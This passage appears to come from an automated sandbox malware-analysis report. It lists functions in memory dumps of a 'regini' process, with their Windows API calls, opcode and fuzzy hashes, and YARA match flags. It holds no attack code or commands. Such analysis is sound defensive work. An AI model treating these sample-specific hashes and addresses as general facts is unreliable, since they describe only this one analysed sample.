                                                                              • Opcode Fuzzy Hash: a0a9baeb9889b603c9e2e519a7b7258e35d53077eb86fa72869950bea680f62f
                                                                              • Instruction Fuzzy Hash: B2F0657B34130436E32165AD9C02FDB774DCF81B75F190029F70CDA2C0D591B40146AA
                                                                              Function 028B9EAB Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 028B9EF5
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateThread
                                                                              • String ID:
                                                                              • API String ID: 2422867632-0
                                                                              • Opcode ID: dea04bd62033553fae845af8bc586f368d4638d44dc6817859a551af279330fd
                                                                              • Instruction ID: 99a2626dff9289eeaf0f97c6d3c8bd3a54a9a414eee43634b460a47f12574928
                                                                              • Opcode Fuzzy Hash: dea04bd62033553fae845af8bc586f368d4638d44dc6817859a551af279330fd
                                                                              • Instruction Fuzzy Hash: 63F02B7E38130036E331219C9C12FC7674E8F42B64F180019F70CDF3C0D891B5428AAA
                                                                              Function 028D9A10 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(028C1BC9,?,028D5CCB,028C1BC9,028D585F,028D5CCB,?,028C1BC9,028D585F,00001000,?,?,00000000), ref: 028D9A4F
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 1e5971ee8760370d2dffdb4a0dfdf9e4f37099d36bec83528a813842de99e206
                                                                              • Instruction ID: f455e2178803d4ca713d0abf19b886fbc8857f6d5db4dcb5a86f2febe4f70e1b
                                                                              • Opcode Fuzzy Hash: 1e5971ee8760370d2dffdb4a0dfdf9e4f37099d36bec83528a813842de99e206
                                                                              • Instruction Fuzzy Hash: BCE06D792002047BD714EF58DC41FDB77ADEFC5714F004009FA19A7240D630B8108AB5
                                                                              Function 028D9A60 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D98E1704,00000007,00000000,00000004,00000000,028C3F5D,000000F4), ref: 028D9A9C
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: c037948d9f93848298b9a3e15d9612d9743a7ffaddaf356af887b74fbf4664e6
                                                                              • Instruction ID: 9ca086a6ff33f993d079cdddfcab4407acec195840f1445520e04ca228732774
                                                                              • Opcode Fuzzy Hash: c037948d9f93848298b9a3e15d9612d9743a7ffaddaf356af887b74fbf4664e6
                                                                              • Instruction Fuzzy Hash: 55E065BA2002047BC614EE59DC41FAB77AEEF88710F104009FA1CA7241C730B9148AB9
                                                                              Function 028C8310 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,028C1EC0,028D819F,028D585F,028C1E83), ref: 028C8343
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 363884f9d38d632f0b34ecf267f7e42575e2d3b88f864772670831cc38b0865f
                                                                              • Instruction ID: 3c3939270d1525a5d2c03969aaba8f1f8a78cda8ca70c9a8c5c117cb857edd64
                                                                              • Opcode Fuzzy Hash: 363884f9d38d632f0b34ecf267f7e42575e2d3b88f864772670831cc38b0865f
                                                                              • Instruction Fuzzy Hash: CAD05E7D7803053FF640A6F8CC06F5A368E9B40754F198068BA0CEB2C1E9A4E0004A67
                                                                              Function 03072C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: e3b92376376056dd122cbe8410babdc9309be898e7d0726aea8d35adae4963fb
                                                                              • Instruction ID: 978ff8379b2714e3c8432404cb067043a0d8e278491b8802dcd243ad10882349
                                                                              • Opcode Fuzzy Hash: e3b92376376056dd122cbe8410babdc9309be898e7d0726aea8d35adae4963fb
                                                                              • Instruction Fuzzy Hash: 3BB09B71D035C9C5EA51F7604608717794967D0701F59C461D3430645F4739C1D1E175